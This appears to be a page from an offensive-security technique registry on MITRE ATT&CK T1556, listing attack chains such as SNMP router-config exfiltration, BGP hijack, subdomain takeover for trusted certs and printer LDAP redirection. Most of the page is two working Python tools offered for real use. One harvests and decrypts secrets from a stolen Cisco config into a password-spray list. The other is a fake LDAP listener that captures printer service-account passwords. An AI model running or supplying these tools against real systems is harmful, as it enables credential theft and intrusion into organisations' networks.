Modify Authentication Process
Subvert auth — Skeleton Key, password filter DLLs, fake LDAP listeners, swapping cert / key material, SSO IdP tampering.
§ Where this technique fits
T1556 sits under the Credential Access tactic in MITRE ATT&CK (it is also listed under Defense Evasion and Persistence). It appears in 5 approved dossiers in the registry, at step 4.2 on average.
Authoritative reference: attack.mitre.org/techniques/T1556/.
§ Dossiers chaining this technique
- step 3 / 5
Insider admin panel coercion → mass account takeover (Twitter 2020)
Identify employees with access to an internal admin panel. Social-engineer or coerce one into using the panel to change the target accounts' e-mail address and 2FA, then take the accounts over.
- step 4 / 6
Subdomain takeover → ACME DNS-01 → trusted cert for victim host
Find a dangling CNAME or NS record and claim the underlying resource. A dangling NS delegation lets you answer the zone's `_acme-challenge` TXT lookups, so Let's Encrypt's DNS-01 challenge for the hostname succeeds; a dangling CNAME gives you the hostname's content instead, which satisfies HTTP-01. Either way you now hold a publicly-trusted cert for victim.example.com; chain into AITM.
- step 4 / 6
SNMPv2c write-community → router config exfil → cred sprays
Find a router whose RW community is still 'private'. Use it to make the router copy its running-config to an attacker-controlled TFTP server. The config carries the RADIUS shared secret, the AAA server IP, ISAKMP PSKs and SSH user public keys; type-7 strings in it are reversible, so recover those and spray the harvested creds.
- step 5 / 5
BGP prefix hijack → traffic interception
From an origin AS you control (or a complicit one), announce either a more-specific prefix inside the victim's allocation or the victim's own prefix with a spoofed origin. Longest-prefix match makes the more-specific win wherever it propagates; Internet routing converges on the attacker AS and traffic for that prefix flows through it for inspection or DoS.
- step 5 / 7
Reconfigure MFP LDAP → harvest service-account credentials
Reach the MFP's admin web panel (walk up to the device or get to it over the network; default creds are common) and change the LDAP address-book server to an attacker IP. The printer immediately re-binds and, on a simple bind, sends its service-account DN and password in cleartext, unless the device enforces LDAPS and validates the server certificate.
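Added example for the SNMP-to-TFTP dossier above (not code from the page or from any tool it names): once the running-config is on the attacker's TFTP host, this Python script pulls the secret-bearing lines out of it, reverses type-7 strings (a fixed-key XOR, not a hash), flags type 5/8/9 hashes as offline-crack-only and type 6 as needing the device master key, and builds the spray list. The SNMP copy itself needs a live device and is not shown. The config text, the RADIUS key and the MD5-crypt hash are constructed for this example; the `cisco` type-7 test vector is the well-known one.

```python
import re

# Cisco IOS type-7 "encryption" is a fixed-key XOR, reversible by design. Added example;
# the config further down is constructed and its hash value is fake.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"
HASH_TYPES = {"4": "SHA-256 (unsalted, deprecated)", "5": "MD5-crypt",
              "8": "PBKDF2-SHA256", "9": "scrypt"}

# "<kind> <type-digit> <value>" as in "password 7 09..." or "key 0 plain"
TYPED = re.compile(r"\b(?P<kind>key|password|secret)\s+(?P<type>[0-9])\s+(?P<val>\S+)")
# IKE pre-shared keys: optional type 0/6, then the key, then the peer selector
ISAKMP = re.compile(r"^crypto isakmp key\s+(?:(?P<type>[06])\s+)?(?P<val>\S+)\s+"
                    r"(?:address|hostname)\s+(?P<peer>\S+)")
COMMUNITY = re.compile(r"^snmp-server community\s+(?P<name>\S+)(?P<rest>.*)$")
# AAA shared secret with no type digit: cleartext (no 'service password-encryption')
UNTYPED_KEY = re.compile(r"^(?:radius-server|tacacs-server)\b.*\bkey\s+(?P<val>\S+)\s*$")


def decode_type7(enc):
    """Reverse a type-7 string: 2-digit decimal seed, then hex pairs XORed with TYPE7_KEY."""
    if len(enc) < 4 or len(enc) % 2 or not enc[:2].isdigit():
        raise ValueError(f"not a type-7 string: {enc!r}")
    seed, data = int(enc[:2]), bytes.fromhex(enc[2:])
    return bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)]
                 for i, b in enumerate(data)).decode("latin-1")


def _classify(kind, typ, raw, line, **extra):
    """One record per secret: what it is, whether it is recoverable now, and the plaintext if so."""
    rec = {"line": line, "kind": kind, "type": typ, "raw": raw, "plaintext": None, "note": ""}
    rec.update(extra)
    if typ == "0":
        rec["plaintext"], rec["note"] = raw, "stored in cleartext"
    elif typ == "7":
        try:
            rec["plaintext"], rec["note"] = decode_type7(raw), "type-7 reversed"
        except ValueError as e:
            rec["note"] = str(e)
    elif typ == "6":
        rec["note"] = "type-6 AES; needs the device's password-encryption master key"
    elif typ in HASH_TYPES:
        rec["note"] = f"{HASH_TYPES[typ]} hash; offline cracking only"
    else:
        rec["note"] = f"unhandled type {typ}"
    return rec


def harvest(config):
    """Walk a running-config and return one record per secret-bearing line, in file order."""
    found = []
    for line_no, line in enumerate(config.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("!"):
            continue
        if m := ISAKMP.match(s):
            found.append(_classify("isakmp-psk", m["type"] or "0", m["val"], line_no, peer=m["peer"]))
        elif m := COMMUNITY.match(s):
            mode = "RW" if re.search(r"\bRW\b", m["rest"]) else "RO"
            found.append(_classify("snmp-community", "0", m["name"], line_no, mode=mode))
        elif m := TYPED.search(s):
            found.append(_classify(m["kind"], m["type"], m["val"], line_no))
        elif m := UNTYPED_KEY.match(s):
            found.append(_classify("key", "0", m["val"], line_no))
    return found


def sprayable(findings):
    """Distinct recovered secrets worth spraying (community strings are not login creds)."""
    return sorted({r["plaintext"] for r in findings
                   if r["plaintext"] and r["kind"] != "snmp-community"})


# Constructed sample of what the TFTP upload contains; hostnames, IPs and hash are made up.
SAMPLE_CONFIG = """\
!
hostname edge-rtr-01
!
username admin privilege 15 password 7 094F471A1A0A
username ops secret 5 $1$aB3dEf$k9M2pQ7rT4vX1yZ5wB8nC0
!
snmp-server community private RW
!
crypto isakmp key VpnPsk2024 address 203.0.113.10
!
radius-server host 10.0.0.5 auth-port 1812 acct-port 1813 key 7 0234245F02131C70
tacacs-server key 0 TacPlain123
"""

if __name__ == "__main__":
    for r in harvest(SAMPLE_CONFIG):
        print(f"line {r['line']:>3} {r['kind']:<14} type {r['type']}  {(r['plaintext'] or '-'):<14} {r['note']}")
    print("spray list:", sprayable(harvest(SAMPLE_CONFIG)))
```

Run as-is it prints a table for the constructed config; pass the real file's text to `harvest()` otherwise. Anything reported as a hash goes to an offline cracker, not the spray list.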
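Added example for the MFP address-book step (and for the "fake LDAP listeners" variant named at the top of the page); it is not code from the page or from any printer vendor. A fake LDAP server only has to understand one PDU, the LDAPv3 BindRequest. This Python script decodes it with a small BER reader, answers with a success BindResponse so the device sees a normal bind, and includes the client side so the exchange can be exercised offline. The DN `cn=printer-svc,...` and the password are constructed; the real listener assumes the printer is pointed at it over plain LDAP on 389.

```python
import socket

# Added example: just enough BER/LDAP (RFC 4511) to read a BindRequest and answer it.
# The DN/password used in the demo at the bottom are constructed.


def ber_int(n):
    """Minimal two's-complement INTEGER contents for a non-negative n."""
    return n.to_bytes(max(1, (n.bit_length() + 8) // 8), "big", signed=True)


def tlv(tag, payload):
    """One BER TLV with definite length: short form below 128 bytes, long form above."""
    n = len(payload)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + payload


def read_tlv(buf, pos):
    """Return (tag, contents, next_pos) for the TLV at pos. Rejects indefinite lengths and
    anything running past the buffer, so a malformed PDU cannot desync the parser."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        n = first & 0x7F
        if n == 0 or pos + n > len(buf):
            raise ValueError("indefinite or truncated length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    else:
        length = first
    end = pos + length
    if end > len(buf):
        raise ValueError("contents run past end of buffer")
    return tag, buf[pos:end], end


def parse_bind_request(msg):
    """Decode one LDAPMessage. Returns bind details for a BindRequest, None for other operations."""
    tag, body, _ = read_tlv(msg, 0)
    if tag != 0x30:                        # LDAPMessage ::= SEQUENCE
        raise ValueError("not an LDAPMessage")
    tag, mid, p = read_tlv(body, 0)
    if tag != 0x02:                        # messageID INTEGER
        raise ValueError("missing messageID")
    tag, op, _ = read_tlv(body, p)
    if tag != 0x60:                        # [APPLICATION 0] BindRequest
        return None
    _, ver, p = read_tlv(op, 0)
    _, name, p = read_tlv(op, p)
    auth_tag, auth, _ = read_tlv(op, p)
    rec = {"msg_id": int.from_bytes(mid, "big", signed=True),
           "version": int.from_bytes(ver, "big"),
           "dn": name.decode("utf-8", "replace")}
    if auth_tag == 0x80:                   # [0] simple: the password travels in the clear
        rec["auth"], rec["password"] = "simple", auth.decode("utf-8", "replace")
    elif auth_tag == 0xA3:                 # [3] sasl: SaslCredentials { mechanism, credentials }
        _, mech, _ = read_tlv(auth, 0)
        rec["auth"], rec["mechanism"] = "sasl", mech.decode("utf-8", "replace")
    else:
        rec["auth"] = f"unknown-choice-{auth_tag:#x}"
    return rec


def bind_response(msg_id, result_code=0):
    """BindResponse { resultCode ENUMERATED, matchedDN "", diagnosticMessage "" }; 0 = success."""
    body = tlv(0x0A, bytes([result_code])) + tlv(0x04, b"") + tlv(0x04, b"")
    return tlv(0x30, tlv(0x02, ber_int(msg_id)) + tlv(0x61, body))


def build_bind_request(msg_id, dn, password):
    """Client side, for testing: the LDAPv3 simple bind an MFP sends to its address-book server."""
    body = tlv(0x02, b"\x03") + tlv(0x04, dn.encode()) + tlv(0x80, password.encode())
    return tlv(0x30, tlv(0x02, ber_int(msg_id)) + tlv(0x60, body))


def serve(host="0.0.0.0", port=389):
    """Fake LDAP server: log every simple bind, answer success, hang up. Port 389 needs root."""
    with socket.create_server((host, port)) as srv:
        while True:
            conn, peer = srv.accept()
            with conn:
                data = conn.recv(65535)    # a bind PDU fits one read; a full server reads by BER length
                try:
                    rec = parse_bind_request(data)
                except ValueError as e:
                    print(f"{peer[0]}: unparseable PDU ({e})")
                    continue
                if rec and rec["auth"] == "simple":
                    print(f"{peer[0]}: bind dn={rec['dn']!r} password={rec['password']!r}")
                    conn.sendall(bind_response(rec["msg_id"]))


if __name__ == "__main__":
    # Offline demo of the exchange; call serve() on a host the printer can reach for the real thing.
    req = build_bind_request(1, "cn=printer-svc,ou=Service Accounts,dc=corp,dc=example", "Pr1nterP@ss")
    print(parse_bind_request(req))
    print(bind_response(1).hex())
```

SASL binds are reported by mechanism only; a device doing NTLM or GSSAPI over SASL needs a different listener, and one that enforces LDAPS with certificate validation will not bind at all.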
§ What commonly comes next
- 01 Valid Accounts (T1078 · Initial Access), seen 2×
- 02 AITM Phishing: Evilginx / Modlishka (PH-AITM-EVILGINX · Initial Access), seen 1×
- 03 Password Spraying (T1110.003 · Credential Access), seen 1×